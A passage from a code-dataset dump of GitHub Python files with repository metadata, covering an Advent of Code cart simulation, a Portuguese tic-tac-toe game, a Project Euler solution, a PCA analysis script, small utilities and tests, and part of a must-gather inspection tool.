1\r\n elif direction == \"down\":\r\n c[0][0] += 1\r\n elif tile == \"-\":\r\n if direction == \"right\":\r\n c[0][1] += 1\r\n elif direction == \"left\":\r\n c[0][1] -= 1\r\n elif tile == \"/\":\r\n if direction == \"up\":\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif direction == \"down\":\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif direction == \"left\":\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n elif direction == \"right\":\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif tile == \"\\\\\":\r\n if direction == \"up\":\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif direction == \"down\":\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif direction == \"left\":\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif direction == \"right\":\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n elif tile == \"+\":\r\n switch = c[2]\r\n if direction == \"up\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][0] -= 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif direction == \"down\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][0] += 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif direction == \"left\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][1] -= 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif direction == \"right\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][1] += 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n # Collision detection\r\n for c 
in range(len(carts)):\r\n for d in range(len(carts)):\r\n if carts[c][0] == carts[d][0] and carts[c] != carts[d]:\r\n # print(\"collision! at\", str(carts[c][0][1]) + \",\" + str(carts[c][0][0]))\r\n if carts[c] in output:\r\n output.remove(carts[c])\r\n if carts[d] in output:\r\n output.remove(carts[d])\r\n return output \r\n\r\ndef represent(graph, carts):\r\n output = [a.copy() for a in graph]\r\n for c in carts:\r\n if c[1] == \"up\":\r\n output[c[0][0]][c[0][1]] = \"^\"\r\n elif c[1] == \"down\":\r\n output[c[0][0]][c[0][1]] = \"v\"\r\n elif c[1] == \"left\":\r\n output[c[0][0]][c[0][1]] = \"<\"\r\n elif c[1] == \"right\":\r\n output[c[0][0]][c[0][1]] = \">\"\r\n for a in output:\r\n print(\"\".join(a))\r\nrepresent(graph,carts)\r\ncount = 0\r\nwhile len(carts) > 1:\r\n carts = iterate(graph, carts)\r\n count += 1\r\n print(count)\r\n # represent(graph, carts)\r\n\r\nprint(\"Final cart at\", carts[0][0][1], carts[0][0][0])\r\n","repo_name":"MatthewGregoire42/AdventOfCode2018","sub_path":"13.2.py","file_name":"13.2.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74141108691","text":"import random\nfrom os import system, name \n\ndef getMatricula():\n \"\"\"\n Retorna a matricula do aluno como string\n \"\"\"\n return \"2020204959\" \n\ndef getNome():\n \"\"\"\n Retorna o nome completo do aluno\n \"\"\"\n return \"Guilherme Cosme Petri Dalmaso\" \n\ndef limpaTela(): \n\tif name == 'nt': \n\t\tsystem('cls') \n\telse: \n\t\tsystem('clear') \n\ndef simboloJogador():\n \"\"\"\n Função para o jogador escolher X ou O para jogar,\n também define o símbolo do PC de acordo com o que o jogador escolher.\n \"\"\"\n escolha = input(\"Escolha X ou O para começar a partida: \")\n if escolha == \"x\" or escolha == \"X\":\n simboloPlayer = \"X\"\n simboloPC = \"O\"\n return simboloPlayer, simboloPC\n elif escolha == \"o\" or escolha == \"O\":\n simboloPlayer = \"O\"\n simboloPC = \"X\"\n return simboloPlayer, simboloPC\n else:\n print(\"Símbolo não reconhecido! Você pode escolher X ou O\")\n return simboloJogador()\n\ndef jogaPrimeiro(Lista = [\"PC\",\"JOGADOR\"]):\n \"\"\"\n Função que escolhe \"aleatóriamente\" quem começa jogando\n \"\"\"\n comeca = (random.choice(Lista))\n if comeca == \"PC\":\n print(\"O PC joga primeiro\")\n return comeca\n elif comeca == \"JOGADOR\":\n print(\"Você começa jogando\")\n return comeca\n\ndef printTabuleiro(tabuleiro):\n \"\"\"\n Função que imprime o tabuleiro\n \"\"\"\n print(f\" {tabuleiro[7]} | {tabuleiro[8]} | {tabuleiro[9]}\")\n print(\"---+---+---\")\n print(f\" {tabuleiro[4]} | {tabuleiro[5]} | {tabuleiro[6]}\")\n print(\"---+---+---\")\n print(f\" {tabuleiro[1]} | {tabuleiro[2]} | {tabuleiro[3]}\")\n\ndef jogadaPlayer(tabuleiro, simboloPlayer):\n \"\"\"\n Solicita o jogador para escolher uma posição no tabuleiro\n \"\"\"\n escolhaJogador = int(input(\"Escolha uma posição de 1 a 9 no tabuleiro: \"))\n if escolhaJogador < 1 or escolhaJogador > 9:\n print(\"Posição Inválida! Escolha novamente\")\n return jogadaPlayer(tabuleiro, simboloPlayer)\n else:\n if tabuleiro[escolhaJogador] != \" \":\n print(\"A posição já foi escolhida! 
Por favor escolha outra opção\")\n return jogadaPlayer(tabuleiro, simboloPlayer)\n else:\n tabuleiro[escolhaJogador] = simboloPlayer\n printTabuleiro(tabuleiro)\n\n\n\ndef jogadaComputador(tabuleiro, simboloComputador):\n \"\"\"\n Recebe o tabuleiro e o simbolo (X ou O) do computador e determina onde o computador deve jogar\n O tabuleiro pode estar vazio (caso o computador seja o primeiro a jogar) ou com algumas posições preenchidas, \n sendo a posição 0 do tabuleiro descartada.\n\n Parâmetros:\n tabuleiro: lista de tamanho 10 representando o tabuleiro\n simboloComputador: letra do computador\n simboloPlayer: letra do jogador\n i: se for 1, significa que o computador é o primeiro a jogar, caso o contrário, é o segundo\n\n Retorno:\n Posição (entre 1 e 9) da jogada do computador\n\n Estratégia:\n Se o Computador for o primeiro a jogar, ele vai escolher alguma das posições das quinas\n Caso o contrário, ele vai verificar se é necessário fazer a defesa\n A partir da 5 rodada, ele vai verificar se já é possível ganhar a partida\n Se não for necessário a defesa, o PC irá atacar\n \"\"\"\n\n if simboloComputador == \"X\":\n simboloPlayer = \"O\"\n else:\n simboloPlayer = \"X\"\n\n if tabuleiro == [\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"]:\n escolhaPC = random.choice([1,3,7,9])\n if escolhaPC == 1:\n return 1\n elif escolhaPC == 3:\n return 3\n elif escolhaPC == 7:\n return 7\n elif escolhaPC == 9:\n return 9\n else:\n #ataque linha 1\n if tabuleiro[1] == simboloComputador and tabuleiro[2] == simboloComputador and tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[1] == simboloComputador and tabuleiro[3] == simboloComputador and tabuleiro[2] == \" \":\n return 2\n elif tabuleiro[2] == simboloComputador and tabuleiro[3] == simboloComputador and tabuleiro[1] == \" \":\n return 1 \n #ataque linha 2 \n elif tabuleiro[4] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[4] == simboloComputador and tabuleiro[6] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[6] == simboloComputador and tabuleiro[4] == \" \":\n return 4 \n #ataque linha 3\n elif tabuleiro[7] == simboloComputador and tabuleiro[8] == simboloComputador and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[7] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[8] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[7] == \" \":\n return 7\n #ataque coluna 1\n elif tabuleiro[1] == simboloComputador and tabuleiro[4] == simboloComputador and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[1] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[4] == \" \":\n return 4\n elif tabuleiro[4] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[1] == \" \":\n return 1\n #ataque coluna 2\n elif tabuleiro[2] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[2] == simboloComputador and tabuleiro[8] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[8] == simboloComputador and tabuleiro[2] == \" \":\n return 2 \n #ataque coluna 3\n elif tabuleiro[3] == simboloComputador and tabuleiro[6] == simboloComputador and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[3] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[6] == \" \":\n return 
6\n elif tabuleiro[6] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[3] == \" \":\n return 3 \n #ataque diagonal 1\n elif tabuleiro[1] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[1] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[1] == \" \":\n return 1 \n #ataque diagonal 2\n elif tabuleiro[3] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[3] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[3] == \" \":\n return 3 \n\n #defesa linha 1\n elif tabuleiro[1] == simboloPlayer and tabuleiro[2] == simboloPlayer and tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[1] == simboloPlayer and tabuleiro[3] == simboloPlayer and tabuleiro[2] == \" \":\n return 2\n elif tabuleiro[2] == simboloPlayer and tabuleiro[3] == simboloPlayer and tabuleiro[1] == \" \":\n return 1 \n #defesa linha 2\n elif tabuleiro[4] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[4] == simboloPlayer and tabuleiro[6] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[6] == simboloPlayer and tabuleiro[4] == \" \":\n return 4\n #defesa linha 3\n elif tabuleiro[7] == simboloPlayer and tabuleiro[8] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[7] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[8] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[7] == \" \":\n return 7\n #defesa coluna 1\n elif tabuleiro[1] == simboloPlayer and tabuleiro[4] == simboloPlayer and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[1] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[4] == \" \":\n return 4\n elif tabuleiro[4] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[1] == \" \":\n return 1\n #defesa coluna 2\n elif tabuleiro[2] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[2] == simboloPlayer and tabuleiro[8] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[8] == simboloPlayer and tabuleiro[2] == \" \":\n return 2\n #defesa coluna 3\n elif tabuleiro[3] == simboloPlayer and tabuleiro[6] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[3] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[6] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[3] == \" \":\n return 3 \n #defesa diagonal 1\n elif tabuleiro[1] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[1] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[1] == \" \":\n return 1 \n #defesa diagonal 2\n elif tabuleiro[3] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[3] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == 
simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[3] == \" \":\n return 3 \n #defesa de ataque pelas quinas \n elif (tabuleiro[1] == simboloPlayer and tabuleiro[9] == simboloPlayer) or (tabuleiro[3] == simboloPlayer and tabuleiro[7] == simboloPlayer):\n if tabuleiro[2] == \" \":\n return 2\n elif tabuleiro[4] == \" \":\n return 4 \n elif tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[8] == \" \":\n return 8 \n elif tabuleiro[6] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n #defesa por posições de numero par\n elif tabuleiro[2] == simboloPlayer or tabuleiro[4] == simboloPlayer or tabuleiro[6] == simboloPlayer or tabuleiro[8] == simboloPlayer:\n if tabuleiro[5] == \" \":\n return 5 \n elif tabuleiro[1] == \" \":\n return 1\n elif tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[9] == \" \":\n return 9 \n #defesa por posições de numero ímpar\n elif tabuleiro[1] == simboloPlayer or tabuleiro[3] == simboloPlayer or tabuleiro[7] == simboloPlayer or tabuleiro[9] == simboloPlayer:\n if tabuleiro[5] == \" \":\n return 5 \n elif tabuleiro[1] == \" \":\n return 1\n elif tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[9] == \" \":\n return 9 \n #ataque\n elif tabuleiro[1] == \" \":\n return 1\n elif tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[9] == \" \":\n return 9 \n elif tabuleiro[2] == \" \":\n return 2 \n elif tabuleiro[4] == \" \":\n return 4\n elif tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[8] == \" \":\n return 8\n\ndef jogadaPC(tabuleiro, simboloComputador, i):\n \"\"\"\n Atribui a jogada feita pelo computador na função 'jogadaComputador' ao tabuleiro\n \"\"\"\n if i == 1:\n escolhaPC = jogadaComputador(tabuleiro, simboloComputador)\n if escolhaPC == 1:\n tabuleiro[1] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 3:\n tabuleiro[3] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 7:\n tabuleiro[7] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 9:\n tabuleiro[9] = simboloComputador\n printTabuleiro(tabuleiro)\n else:\n escolhaPC = jogadaComputador(tabuleiro, simboloComputador)\n if escolhaPC == 1:\n tabuleiro[1] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 2:\n tabuleiro[2] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 3:\n tabuleiro[3] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 4:\n tabuleiro[4] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 5:\n tabuleiro[5] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 6:\n tabuleiro[6] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 7:\n tabuleiro[7] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 8:\n tabuleiro[8] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 9:\n tabuleiro[9] = simboloComputador\n printTabuleiro(tabuleiro) \n\ndef verificaJogada(tabuleiro):\n \"\"\"\n Verifica se o 'X' ou 'O' ganhou o Jogo, se até a ultima rodada nenhum dos 2 ganhar, é considerado empate\n \"\"\"\n #Se X vencer\n #linhas\n if tabuleiro[7] == 'X' and tabuleiro[8] == 'X' and tabuleiro[9] == 'X':\n return True\n elif tabuleiro[4] == 'X' and tabuleiro[5] == 'X' and tabuleiro[6] == 'X':\n return True\n elif tabuleiro[1] == 'X' and tabuleiro[2] == 'X' and tabuleiro[3] == 'X':\n return True\n #colunas\n elif tabuleiro[1] == 'X' and 
tabuleiro[4] == 'X' and tabuleiro[7] == 'X':\n return True\n elif tabuleiro[2] == 'X' and tabuleiro[5] == 'X' and tabuleiro[8] == 'X':\n return True\n elif tabuleiro[3] == 'X' and tabuleiro[6] == 'X' and tabuleiro[9] == 'X':\n return True\n #diagonal\n elif tabuleiro[1] == 'X' and tabuleiro[5] == 'X' and tabuleiro[9] == 'X':\n return True\n elif tabuleiro[3] == 'X' and tabuleiro[5] == 'X' and tabuleiro[7] == 'X':\n return True \n\n #Se O vencer\n #linhas\n if tabuleiro[7] == 'O' and tabuleiro[8] == 'O' and tabuleiro[9] == 'O':\n return True\n elif tabuleiro[4] == 'O' and tabuleiro[5] == 'O' and tabuleiro[6] == 'O':\n return True\n elif tabuleiro[1] == 'O' and tabuleiro[2] == 'O' and tabuleiro[3] == 'O':\n return True\n #colunas\n elif tabuleiro[1] == 'O' and tabuleiro[4] == 'O' and tabuleiro[7] == 'O':\n return True\n elif tabuleiro[2] == 'O' and tabuleiro[5] == 'O' and tabuleiro[8] == 'O':\n return True\n elif tabuleiro[3] == 'O' and tabuleiro[6] == 'O' and tabuleiro[9] == 'O':\n return True\n #diagonal\n elif tabuleiro[1] == 'O' and tabuleiro[5] == 'O' and tabuleiro[9] == 'O':\n return True\n elif tabuleiro[3] == 'O' and tabuleiro[5] == 'O' and tabuleiro[7] == 'O':\n return True \n\ndef main():\n \"\"\"\n Chama as funções principais e dedtermina a ordem das jogadas\n \"\"\"\n limpaTela()\n print(getMatricula())\n print(getNome())\n print(\"SEJA BEM VINDO AO DESAFIO DO JOGO DA VELHA!\")\n simboloPlayer, simboloComputador = simboloJogador()\n primeiraJogada = jogaPrimeiro()\n tabuleiro = [\" \"]*10\n printTabuleiro(tabuleiro)\n if primeiraJogada == \"PC\":\n #1\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 1)\n #2\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #3\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n #4 \n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #5\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n verificaJogada(tabuleiro)\n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit()\n #6\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #7\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2)\n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #8\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #9\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n else:\n print(\"Empate!!!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit()\n elif primeiraJogada == \"JOGADOR\":\n #1\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #2\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n #3\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #4\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n #5\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n 
verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #6\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2)\n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #7\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #8\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #9\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n else:\n print(\"Empate!!!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n\n## NÃO ALTERE O CÓDIGO ABAIXO ##\nif __name__ == \"__main__\":\n main()","repo_name":"guicosme1/Trabalhos-Python","sub_path":"cc1/jogodavelha.py","file_name":"jogodavelha.py","file_ext":"py","file_size_in_byte":20618,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17033256530","text":"with open (\"data/pe067.txt\", \"r\") as myfile:\n f = myfile.readlines()\n\nt = []\n\nfor lin in f:\n t.append(list(map(int, lin.split(\" \"))))\n\ndef next_max(prev_max, new_line):\n next = []\n for i in range(0, len(new_line)):\n n_max = new_line[i]\n left_max = prev_max[max(0, i - 1)]\n right_max = prev_max[min(len(prev_max) - 1, i)]\n n_max += max(left_max, right_max)\n next.append(n_max)\n return next\n\nm_list = t[0]\n\nfor i in range(1, len(t)):\n m_list = next_max(m_list, t[i])\n\nprint(max(m_list))\n \n\n","repo_name":"kwichmann/euler","sub_path":"pe067.py","file_name":"pe067.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24732130687","text":"import os\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.preprocessing import StandardScaler\nfrom data_load import load_data\n\n\ndata_dir = '/home/ilya/code/ml4vs/data/dataset_OGLE/indexes_normalized'\nfile_1 = 'vast_lightcurve_statistics_normalized_variables_only.log'\nfile_0 = 'vast_lightcurve_statistics_normalized_constant_only.log'\nfile_0 = os.path.join(data_dir, file_0)\nfile_1 = os.path.join(data_dir, file_1)\nnames = ['Magnitude', 'clipped_sigma', 'meaningless_1', 'meaningless_2',\n 'star_ID', 'weighted_sigma', 'skew', 'kurt', 'I', 'J', 'K', 'L',\n 'Npts', 'MAD', 'lag1', 'RoMS', 'rCh2', 'Isgn', 'Vp2p', 'Jclp', 'Lclp',\n 'Jtim', 'Ltim', 'CSSD', 'Ex', 'inv_eta', 'E_A', 'S_B', 'NXS', 'IQR']\nnames_to_delete = ['Magnitude', 'meaningless_1', 'meaningless_2', 'star_ID',\n 'Npts', 'CSSD']\nX, y, df, feature_names, delta = load_data([file_0, file_1], names, names_to_delete)\n\n\nrpca = decomposition.RandomizedPCA()\nimp = Imputer(missing_values='NaN', strategy='median', axis=0, verbose=2)\nrpca_pipe = Pipeline(steps=[('imputation', imp),\n ('scaling', StandardScaler()),\n ('pca', 
rpca)])\nrpca_pipe.fit(X)\n\n\npca = decomposition.PCA()\nimp = Imputer(missing_values='NaN', strategy='median', axis=0, verbose=2)\npca_pipe = Pipeline(steps=[('imputation', imp),\n ('scaling', StandardScaler()),\n ('pca', pca)])\npca_pipe.fit(X)\n\nplt.figure(1, figsize=(4, 3))\nplt.clf()\nplt.axes([.2, .2, .7, .7])\nplt.plot(pca.explained_variance_ratio_, linewidth=2, color='b')\nplt.legend()\nplt.axis('tight')\nplt.xlabel(u'number of components')\nplt.ylabel(u'explained variance, $\\%$')\nplt.show()\nplt.savefig('PCA.png', bbox_inches='tight', dpi=200)\n\n","repo_name":"ipashchenko/ml4vs","sub_path":"ml4vs/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33584557532","text":"from stall.model.assortment_product import AssortmentProduct\n\nasync def test_assortment_product(tap, dataset):\n with tap.plan(6):\n\n assortment = await dataset.assortment(title='привет')\n tap.ok(assortment, 'Создан ассортимент')\n tap.ok(assortment.assortment_id, 'идентификатор')\n tap.eq(assortment.title, 'привет', 'название')\n\n product = await dataset.product()\n tap.ok(product, 'продукт создан')\n\n\n ap = AssortmentProduct({\n 'assortment_id': assortment.assortment_id,\n 'product_id': product.product_id,\n 'max': 50,\n })\n\n tap.ok(ap, 'инстанцирован')\n tap.ok(await ap.save(), 'сохранён')\n\n\n\nasync def test_dataset(tap, dataset):\n with tap.plan(1):\n\n ap = await dataset.assortment_product()\n tap.ok(ap, 'продукт для ассортимента описан')\n\n\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests/model/assortment_product/test_instance.py","file_name":"test_instance.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20070115888","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# イメージ画像フォルダへのフルパス\nimage_path = \"FULL_PATH\"\n\nimg = cv2.imread(image_path + 'messi5.jpg',1)\nb,g,r = cv2.split(img)\nimg2 = cv2.merge([r,g,b])\nplt.imshow(img2)\nplt.xticks([]),plt.yticks([])\nplt.show()\n","repo_name":"dobuzora/practice","sub_path":"python/OpenCV/Tutorials/Gui_Features/1.Images/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"8016648145","text":"import json\nimport os\n\n\ndef get_json_data(directory, prefix):\n for dirname, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n if not filename.startswith(prefix) or not filename.endswith('.json'):\n continue\n print(\"loading \" + filename)\n yield json.load(open(os.path.join(dirname, filename), 'r'), encoding='utf-8')\n","repo_name":"boehlke/openslides_ansible","sub_path":"python/multiinstance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1661133097","text":"import re\nfrom loguru import logger as lg\nfrom omg.config import config\nfrom omg.must_gather.load_resources import load_res\nfrom omg.must_gather.locate_yamls import locate_project\nfrom omg.utils.dget import dget\n\n\ndef _hide_hash(path):\n \"\"\"Hide the image hash in the path for better readability.\"\"\"\n return re.sub(\"sha256-[a-z0-9]*\", \"sha256*\", path)\n\n\ndef _show_info(path):\n\n out = 
lg.opt(colors=True).success\n\n proj_count = len(locate_project(path, \"yamls\"))\n out(\" Projects: {}\".format(proj_count))\n\n try:\n infra = load_res(path, \"infrastructure\")\n if infra:\n api_url = [\n dget(i, [\"res\", \"status\", \"apiServerURL\"]) for i in infra\n ]\n platform = [\n dget(i, [\"res\", \"status\", \"platform\"]) for i in infra\n ]\n out(\" API URL: {}\".format(api_url))\n out(\" Platform: {}\".format(platform))\n\n c_ver = load_res(path, \"clusterversion\")\n if c_ver:\n cluster_id = [\n dget(cv, [\"res\", \"spec\", \"clusterID\"]) for cv in c_ver\n ]\n desired_v = [\n dget(cv, [\"res\", \"status\", \"desired\", \"version\"]) for cv in c_ver\n ]\n out(\" Cluster ID: {}\".format(cluster_id))\n out(\" Desired Version: {}\".format(desired_v))\n out(\"\")\n except Exception as e:\n lg.warning(\"Error loading cluster info: {}\".format(e))\n\n\ndef show_mg_info(cfile=None):\n \"\"\"\n Shows the info of current selected must-gather(s)\n \"\"\"\n lg.debug(\"FUNC_INIT: {}\".format(locals()))\n\n cfg = config.get(cfile=cfile)\n lg.debug(\"Loaded config file: {}\".format(cfg))\n\n paths = cfg[\"paths\"]\n project = cfg[\"project\"]\n\n out = lg.opt(colors=True).success\n\n if \"cwd\" in cfg and cfg[\"cwd\"]:\n out(\"-=[CWD Mode]=-\")\n out(\"\")\n\n if len(paths) > 1:\n out(\"-=[MultiDir Mode]=-\")\n out(\"\")\n out(\"Selected must-gather paths:\")\n i = 1\n for path in paths:\n out(\" 